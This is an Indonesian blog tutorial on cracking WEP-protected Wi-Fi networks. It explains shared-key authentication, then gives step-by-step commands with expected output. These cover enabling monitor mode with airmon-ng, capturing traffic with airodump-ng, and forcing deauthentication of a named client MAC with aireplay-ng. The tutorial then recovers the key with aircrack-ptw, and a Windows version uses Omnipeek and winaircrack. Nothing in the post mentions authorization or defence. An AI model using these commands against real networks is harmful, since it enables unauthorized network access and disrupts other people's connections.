RSS

Hacking WEP dengan Aircrack

 WEP
Shared Key atau WEP (Wired Equivalent Privacy) adalah suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication. Shared KeyAuthentication adalah metoda otentikasi yang membutuhkan penggunaan WEP.Enkripsi WEP menggunakan kunci yang dimasukkan (oleh administrator) ke client maupun access point. Kunci ini harus cocok dari yang diberikan akses point ke client, dengan yang dimasukkan client untuk authentikasi menuju access point.

Proses Shared Key Authentication:
1. client meminta asosiasi ke access point, langkah ini sama seperti Open System Authentication.
2. Access point mengirimkan text challenge ke client secara transparan.
3. Client akan memberikan respon dengan mengenkripsi text challenge dengan menggunakan kunci WEP dan mengirimkan kembali ke access point.
4. Access point memberi respon atas tanggapan client, akses point akan melakukan decrypt terhadap respon enkripsi dari client untuk melakukan verifikasi bahwa text challenge dienkripsi dengan menggunakan WEP key yang sesuai. Pada proses ini, access point akan menentukan apakah client sudah memberikan kunci WEP yang sesuai. Apabila kunci WEP yang diberikan oleh client sudah benar, maka access point akan merespon positif dan langsung meng-authentikasi client. Namun bila kunci WEP yang dimasukkan client adalah salah, maka access point akan merespon negatif dan client tidak akan diberi authentikasi. Dengan demikian, client tidak akan terauthentikasi dan tidak terasosiasi.
Menggunakan Aircrack-ptw
Akses point mengirimkan paket yang dinamakan beacon frame sekitar 10 beacon
frame setiap detiknya.Setiap paket data yang dikirimkan mengandung :
1. Nama dari network/akses point (ESSID)
2. Enkripsi yang digunakan
3. Berapa Mbit rata-rata data yang di support
4. Channel yang sedang aktif
Data-data ini lah yang digunakan oleh aircrak-ptw untuk menembus proteksi dari
suatu akses point.
Aircrack-ptw adalah generasi terbaru setelah aircrack-ng, dimana aircrack-ptw membutuhkan waktu yang lebih cepat untuk mendekripsi sebuah key dari suatu akses point, tetapi aircrack-ptw ini masih memerlukan komponen-komponen dari aircrackng, yaitu airodump-ng untuk mengcapture paket dan aireplay-ng untuk melakukan berbagai serangan jika perlu, misalnya untuk memaksa target untuk mengenerate ARP request dan lain-lain.
Contoh serangan airepla-ng :
aireplay-ng --deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0
ath0
serangan ini untuk memaksa target untuk mengenerate ARP request.
Mode serangan yang lain adalah :
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--test : tests injection and quality (-9)
mode serangan bisa diganti dengan menggunakan kode angka.
Langkah-Langkah Menggunakan Aircrack-ptw
1. Configurasi wireless card
$ airmon-ng stop ath0
$ iwconfig
pastikan respon sistem sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
berikan command airmon-ng start wifi0 9, untuk menjalankan wireless card pada channel tertentu
$ airmon-ng start wifi0 9
maka sistem harus merespon
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
berikan command
$ ifconfig ath0 up
dan pastikan sistem harus merespon sebagai berikut :
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point:
00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
2. Jalankan Airodump-ng
airodump-ng --channel X --write prefix_for_capture_file
interface
$ airodump-ng --channel 3 --write tes ath0
data hasil capture akan ditulis dalam file tes, oleh airodump-ng akan disimpan dengan nama tes-01.cap
3. Jalankan aireplay (optional)
Langkah ini dilakukan jika airodump-ng tidak mendapatkan paket yang ditangkap, maka target dapat dipaksa untuk mengenerate ARP request
aireplay-ng --deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
deuth : jenis serangan
-a : BSSID akses point
-c : Mac Address target
15 : jumlah paket yang dikirim
4. Jalankan aircrack-ptw
$ aircrack-ptw tes-01.cap

Cracking WEP Menggunakan Winaircrack
Winaircrack adalah sebuah perangkat lunak berbasis Microsoft Windows yang merupakan pengembangan dari software aircrack. Dimana untuk winaircrack ditambahakan suatu user interface agar user tidak sulit lagi untuk menggunakan beberapa programnya seperti aircrack, airdecap, airodump, wzcook.
Cara kerja dari perangkat lunak untuk melakukan cracking WEP adalah dengan melakukan monitor terhadap seluruh paket-paket wireless dan kemudian paket-paket tersebut akan dianalisis oleh program aircrack untuk memecahkan enkripsi WEPnya.
Implementasi winaircrack dapat dilakukan dengan langkah-langkah berikut :
1. Lakukan pemeriksaan terhadap kartu jaringan wireless yang digunakan. Tidak semua kartu jaringan didukung oleh perangkat lunak untuk memonitor jaringan. Kartu jaringan wireless yang banyak digunakan di laptop yang ada sekarang sebagian besar adalah Intel pro 3945ABG. Driver dari kartu jaringan ini tidak mendukung untuk langsung melakukan monitor paket. Untuk itu harus melakukan downgrade driver menuju ke versi 10.5.1.72 atau 10.5.1.75.
2. Langkah yang berikutnya adalah untuk menginstall program Omnipeek. Kegunaan program ini adalah untuk menangkap paket-paket yang dikirimkan oleh access point menuju ke kartu jaringan wireless. Biasanya paket data dienkripsi dalam dengan WEP.


3. Selanjutnya adalah melakukan monitoring terhadap paket wireless yang dilakukan dengan menekan tombol new capture. Berikutnya pilih bagian ‘802.11’ dengan tujuan untuk memilih paket-paket data apa saja yang akan dimonitor. Monitoring dapat dilakukan untuk merekam data channel, BSSID, atau ESSID tertentu.

4. Tekan tombol ‘Capture’ untuk mulai menyimpan paket data. Jika dirasa sudah cukup, maka dapat ditekan tombol ‘Stop Capture’ untuk menghentikan pemantauan.
5. Sinpan file yang berisi paket data dengan ekstensi .dmp
6. Program berikutnya yang diperlukan adalah winaircrack. Setelah menjalankan program ini, pilih file .dmp yang telah disimpan sebelumnya, dan kemudian klik tombol ‘aircrack the key’

7. Untuk dapat memecahkan kunci, maka program aircrack memerlukan jumlah data yang sangat banyak, dapat mencapai 300.000 data untuk enkripsi 40 bit, dan mencapai 800.000 paket untuk dapat membuka kunci 104 bit

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

0 komentar:

Posting Komentar